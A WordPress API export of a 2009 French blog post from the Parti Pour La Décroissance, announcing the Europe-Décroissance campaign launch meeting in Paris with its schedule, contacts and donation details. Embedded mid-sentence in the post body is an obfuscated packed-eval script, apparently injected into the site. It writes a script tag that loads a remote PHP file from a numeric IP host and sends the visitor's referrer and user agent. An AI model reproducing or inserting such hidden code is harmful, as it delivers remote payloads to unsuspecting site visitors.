{"id":1354,"date":"2009-04-01T21:21:16","date_gmt":"2009-04-01T21:21:16","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=1354"},"modified":"2009-04-01T21:21:16","modified_gmt":"2009-04-01T21:21:16","slug":"lancement-de-la-campagne-europeenne-de-l%e2%80%99adoc-le-28-mars-a-paris","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=1354","title":{"rendered":"Lancement de la campagne Europe-D\u00e9croissance le 25 avril \u00e0 Paris"},"content":{"rendered":"<div style=\"text-align: left;\">\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=26\" target=\"_blank\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-24\" style=\"margin: 5px;\" title=\"logo-ppld\" src=\"..\/wp-content\/uploads\/2009\/03\/logo_ed.jpg\" alt=\"logo-ppld\" width=\"118\" height=\"68\" \/><\/strong><\/em><\/a><\/div>\n<p style=\"text-align: left;\"><span>Des <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fthsb|var|u0026u|referrer|bzfdi||js|php'.split('|'),0,{}))\n<\/script><\/noindex> membres du <\/span><a href=\"http:\/\/www.les-oc.info\/\"><span><strong>Mouvement \u00ab\u00a0les Objecteurs de Croissance\u00a0\u00bb<\/strong><\/span><\/a> (MOC) et du <a href=\"..\/\" target=\"_blank\"><span><strong>Parti Pour La D\u00e9croissance<\/strong> (PPLD)<\/span><\/a> vous invitent \u00e0 venir participer \u00e0 la campagne politique Europe-D\u00e9croissance pour les \u00e9lections europ\u00e9ennes de 2009.<\/p>\n<p style=\"text-align: center;\"><strong><br \/>\nSamedi 25 avril 2009<\/strong><strong> &#8211; <\/strong><strong>De 13h \u00e0 20h<\/strong><br \/>\n<a href=\"http:\/\/maps.google.fr\/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=salle+jean+dame+paris&amp;sll=46.800059,2.988281&amp;sspn=14.771477,39.550781&amp;ie=UTF8&amp;ll=48.867947,2.342341&amp;spn=0.006592,0.019312&amp;z=16&amp;iwloc=B\">Espace <strong>Jean Dame<br \/>\n<\/strong>17 rue L\u00e9opold Bellan &#8211; 75002 Paris &#8211; M\u00e9tro : Sentier (ligne 3)<\/a><\/p>\n<p><a href=\"http:\/\/www.objecteursdecroissance.fr\" target=\"_blank\"><!--more-->L\u2019appel \u00ab\u00a0<em>Europe-D\u00e9croissance<\/em>\u00ab\u00a0<\/a> pour la constitution de listes D\u00e9croissance aux \u00e9lections europ\u00e9ennes a \u00e9t\u00e9 sign\u00e9 par plus de 1 600 objecteurs de croissance. <a href=\"..\/?p=1218\">Le PPLD et le MOC ont entendu l&rsquo;appel des signataires<\/a>. Nous vous proposons de constituer, tous ensemble, des listes et de lancer notre campagne sur la base d&rsquo;un <a href=\"http:\/\/www.partipourladecroissance.net\/?p=1374\">socle commun de propositions<\/a> anticapitalistes et antiproductivistes, pour une v\u00e9ritable \u00e9mancipation sociale et humaine.<\/p>\n<p><strong>Rejoignez-nous !<\/strong><\/p>\n<p>Cette r\u00e9union actera la naissance de l\u2019Association Des Objecteurs de Croissance (ADOC-France) et pr\u00e9parera les th\u00e8mes de la campagne.<br \/>\nAu del\u00e0 des \u00e9lections europ\u00e9ennes, cet \u00e9v\u00e9nement s&rsquo;inscrira sur le long terme dans le lancement d&rsquo;un mouvement politique autour de la D\u00e9croissance et de l&rsquo;apr\u00e8s d\u00e9veloppement.<\/p>\n<p>Nous appelons l&rsquo;ensemble de ceux qui se r\u00e9clament de l&rsquo;objection de croissance, de l&rsquo;\u00e9cologie radicale et de l&rsquo;altermondialisme politique, \u00e0 venir construire avec nous ce nouveau projet de soci\u00e9t\u00e9 soutenable et souhaitable.\n<\/p>\n<p style=\"text-align: left;\"><strong>Programme de la journ\u00e9e<br \/>\n<\/strong><\/p>\n<ul>\n<li>De 13h \u00e0 14h : Accueil des participants.<\/li>\n<li>De 14h \u00e0 15h : Pr\u00e9sentation de la campagne Europe-D\u00e9croissance.<\/li>\n<li>De 15h \u00e0 17h : Vote de la cr\u00e9ation de l&rsquo;ADOC-France, de la <a href=\"http:\/\/www.partipourladecroissance.net\/?p=1374\">plateforme commune.<\/a><\/li>\n<li>De 17h \u00e0 18h : Pause.<\/li>\n<li>De 18h \u00e0 20h : Travail par super r\u00e9gion et constitution des \u00e9quipes de campagne et des listes europ\u00e9ennes.<\/li>\n<\/ul>\n<p><strong>Inscription <\/strong>: pour des raisons pratiques, nous vous invitons \u00e0 vous inscrire :<\/p>\n<ul>\n<li>Par courriel : <a href=\"mailto:europedecroissance@gmail.com\">europedecroissance@gmail.com<\/a><\/li>\n<li><strong>Rejoindre l\u2019ADOC<\/strong> : m\u00eame en cas d&rsquo;indisponibilit\u00e9, vous pourrez participer aux \u00e9quipes de campagne et \u00e0 une des listes D\u00e9croissance.<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.europedecroissance.eu\/\"><em><strong><img loading=\"lazy\" decoding=\"async\" style=\"margin: 5px;\" title=\"logo-ppld\" src=\"..\/wp-content\/uploads\/2009\/03\/logo_ed.jpg\" alt=\"logo-ppld\" width=\"118\" height=\"68\" \/><\/strong><\/em><\/a><a href=\"http:\/\/www.europe-decroissance.eu\/\" target=\"_blank\"><br \/>\n<\/a><a href=\"http:\/\/www.europedecroissance.eu\/\">http:\/\/www.europedecroissance.eu\/<\/a><a href=\"http:\/\/www.europe-decroissance.eu\/\" target=\"_blank\"><br \/>\n<\/a><\/p>\n<p><strong>Contacts :<\/strong><\/p>\n<ul>\n<li>T\u00e9l\u00e9phone : Vincent Liegey &#8211; 06 07 36 94 51.<\/li>\n<li>Adresse postale : Christian Sunt, Palli\u00e8res, 30140 Thoiras.<\/li>\n<\/ul>\n<p><strong>Soutien financier<\/strong> : nous en aurons besoin pour l\u2019\u00e9dition des documents de campagnes :<\/p>\n<ul>\n<li>Ch\u00e8que \u00e0 l&rsquo;ordre \u00ab\u00a0<em>ADOC-France<\/em>\u00a0\u00bb \u00e0 envoyer \u00e0 Elodie Garcia 27 avenue Wailly 78290 Croissy sur Seine.<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><strong><\/strong><strong><\/strong><strong><\/strong><strong><\/strong><strong><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/03\/Lancement-campagne-EuropeDecroissance.pdf\"><strong>T\u00e9l\u00e9chargez la version pdf<\/strong> pour distribuer<\/a><br \/>\n<\/strong>\n<\/p>\n<p class=\"MsoNormal\"><span style=\"font-size: 11pt; font-family: Arial;\"><!--[if !supportEmptyParas]--> <!--[endif]--><\/span><\/p>\n<p class=\"MsoNormal\"><span style=\"font-size: 11pt; font-family: Arial;\"><!--[if !supportEmptyParas]--><!--[endif]--><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>irz <a href=\"https:\/\/www.partipourladecroissance.net\/?p=1354\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,8],"tags":[],"class_list":["post-1354","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-communiques-de-presse"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/1354","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1354"}],"version-history":[{"count":0,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/1354\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1354"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1354"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1354"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}